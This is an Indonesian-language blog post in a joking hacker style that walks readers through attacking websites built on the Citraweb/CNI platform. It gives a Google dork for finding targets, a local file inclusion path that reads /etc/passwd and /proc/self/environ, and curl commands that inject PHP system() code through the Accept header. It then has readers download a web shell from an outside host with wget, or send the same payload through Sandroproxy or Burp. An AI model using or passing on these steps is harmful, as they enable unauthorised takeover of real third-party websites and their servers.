Breaking

Selasa, 17 September 2019

Citraweb local file inclusion to remote code execution

Halo apa kabar bro balik lagi sama admin ganteng idaman ukhti sedjak doeloe. Gabut > coret coret blog begitulah aktivitas admin ganteng idaman ukhti ini muehehe.

Dijudul sudah jelas disini w bagi tutor citraweb local file inclusion to remote code execution. Gatau kenapa w jadi tertarik Ama er ce eh muehehe ok langsung sadja

Dork:
inurl:/cni-content/ (kembangin tros bagi w)
Dorking dlu di google :vroh disini aink sudah dapat web yg vuln
Coba ke /system/ajax/?/etc/passwd (localhost/system/ajax/?/etc/passwd)
Kek gitu contoh vuln

Lalu kita ke /system/ajax/?/proc/self/environ (localhost/system/ajax/?/proc/self/environ)
Coba lihat ada HTTP Header Kita tinggal ganti http header bisa User Agent , Accept, Cookie, dll
Kita coba dengan Accept ea.

Buka termux lalu ketik
curl -H "Accept: <?php echo system(\"ls -la\"); ?>" http://localhost:8080/system/ajax/?/proc/self/environ
Klu muncul dir listing nya tinggal wget shell sadja :vroot

Klu punya masalah yg sama kek w contoh nya kek gini
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.

Tinggal tambahkan --output file.txt
Contoh
curl -H "Accept: <?php echo system(\"ls -la\"); ?>" http://localhost:8080/system/ajax/?/proc/self/environ --output file.txt
Lalu untuk melihat dir listing nya ketik
cat file.txt
Selanjutnya untuk upload shell nya tinggal wget ajalah njir ganti ls -la jadi wget linkshell.com/Shell.txt -O Shell.php akses Shell nya ada di localhost/shell.php

Kalian juga bisa mengeksekusinya dengan Sandroproxy atau Burpsuite klu di PC :'v, caranya? Cek gaes.

Langsung aja kunjungin web target lo di Lightning Browser ea, lalu ke Sandroproxy nya gayn
Pilih yg bawah tuh lalu pilih Manual request na xixixi.

Seperti diatas, w coba masukin command nya di bagian Accept ea ;v

<?php echo system("Command Here"); ?>
Bakekok boenda sudah muncul id user, group na ;v xixixi. Sekian dulu artikel nya ges babay

Tidak ada komentar:

Posting Komentar